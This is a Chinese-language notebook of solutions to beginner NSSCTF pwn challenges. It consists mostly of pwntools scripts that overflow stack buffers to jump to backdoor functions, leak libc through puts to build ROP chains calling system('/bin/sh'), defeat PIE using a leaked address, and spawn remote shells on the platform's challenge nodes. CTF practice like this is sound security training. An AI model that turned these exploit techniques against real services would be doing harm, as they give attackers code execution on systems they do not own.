NSSCTF_pwn_刷題筆記page(1)
[SWPUCTF 2021 新生賽]gift_pwn
from pwn import *
io = remote('node4.anna.nssctf.cn',28991)
padding = 16+8
shell = 0x4005B6
payload = b'A'*padding+p64(shell)
io.sendline(payload)
io.interactive()
[SWPUCTF 2021 新生賽]whitegive_pwn
from pwn import *
from LibcSearcher import LibcSearcher
context.log_level = 'debug'
io = remote('node4.anna.nssctf.cn',28982)
#io = gdb.debug('./附件')
elf = ELF('./附件')
padding = 16+8
pop_rdi = 0x0000000000400763
payload = b'A'*padding + p64(pop_rdi)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(elf.sym['main'])
io.sendline(payload)
puts_addr = u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
print(hex(puts_addr))
base_offset = puts_addr - 0x06f6a0
sys = 0x0453a0+base_offset
bin_sh = 0x18ce57+base_offset
payload1 = b'A'*padding+p64(pop_rdi)+p64(bin_sh)+p64(sys)
io.sendline(payload1)
io.interactive()
libc版本要另外搜尋
[CISCN 2019華北]PWN1
from pwn import *
context.log_level = 'debug'
io = remote('node4.anna.nssctf.cn',28020)
padding = 44
payload =b'A'*padding+p64(0x41348000)
io.sendlineafter(b'number.',payload)
io.interactive()
from pwn import *
context.log_level = 'debug'
io = remote('node4.anna.nssctf.cn',28020)
padding = 56
payload =b'A'*padding+p64(0x4006be)
io.sendlineafter(b'number.',payload)
io.interactive()
[NISACTF 2022]ReorPwn?
hs/nib/
[BJDCTF 2020]babystack2.0
from pwn import *
context.log_level = 'debug'
#io = process('./pwn')
#io = gdb.debug('./pwn')
io = remote('node4.anna.nssctf.cn',28485)
padding = 12+8+4
payload = b'A'*padding+p64(0x400726)
io.sendlineafter('name:\n',b'-1')
io.sendlineafter('name?\n',payload)
io.interactive()
#本地要棧對齊
ida判斷的棧空間不正確,手動除錯一下
[HNCTF 2022 Week1]easync
nc進去找,格式為nssctf{}
[BJDCTF 2020]babystack
from pwn import *
context.log_level = 'debug'
#io = process('./ret2text')
#io = gdb.debug('./ret2text')
io = remote('node4.anna.nssctf.cn',28587)
padding = 12+8+4
payload = b'A'*padding+p64(0x4006e6)
io.sendlineafter('name:\n',b'100')
io.sendlineafter('?\n',payload)
io.interactive()
#本地要棧對齊
ida判斷的棧空間不正確,手動除錯一下
[SWPUCTF 2022 新生賽]Does your nc work?
nc進去找
[NISACTF 2022]ezstack
from pwn import *
#io = process('./pwn')
io = remote('node5.anna.nssctf.cn',28318)
elf = ELF('./pwn')
padding = 72+4
payload = b'A'*padding + p32(0x8048512)+p32(0x804A024)
io.sendline(payload)
io.interactive()
32位程式呼叫函式方法與64位不同
[watevrCTF 2019]Voting Machine 1
from pwn import *
#io = process('./pwn')
io = remote('node5.anna.nssctf.cn',28007)
payload = b'A'*padding + p64(0x400807)
io.sendline(payload)
io.recvall()
io.interactive()
有後門函式...
[NISACTF 2022]ezpie
from pwn import *
#io = process('./pwn')
io = remote('node5.anna.nssctf.cn',28323)
padding = 44
io.recvuntil(b'gift!\n')
main_addr = eval(io.recvline().decode())
base_offset = main_addr - 0x770
shell_addr = base_offset+0x80F
payload = b'A'*padding +p32(shell_addr)
io.sendline(payload)
io.interactive()
主要是pie機制,和洩露lib差不多的思路
[HGAME 2023 week1]test_nc
cat flag
[GFCTF 2021]where_is_shell
from pwn import *
#io = process('./shell')
io = remote('node4.anna.nssctf.cn',28065)
elf = ELF('./shell')
pop_rdi = 0x00000000004005e3 #: pop rdi ; ret
sys_addr = 0x400557
ret_addr = 0x0000000000400416 #: ret
padding = 0x10+8
payload = b'A'*padding+p64(ret_addr)+p64(pop_rdi)+p64(0x400541)+p64(elf.plt['system'])+p64(ret_addr)
io.sendline(payload)
io.interactive()
可以利用system($0)獲得shell許可權,$0在機器碼中為 \x24\x30,tips函式中提供了相應的機器碼,又一個小知識點
[HNCTF 2022 Week1]easyoverflow
1111111111111111111111111111111111111111111111111111
引數覆蓋,溢位v4覆蓋v5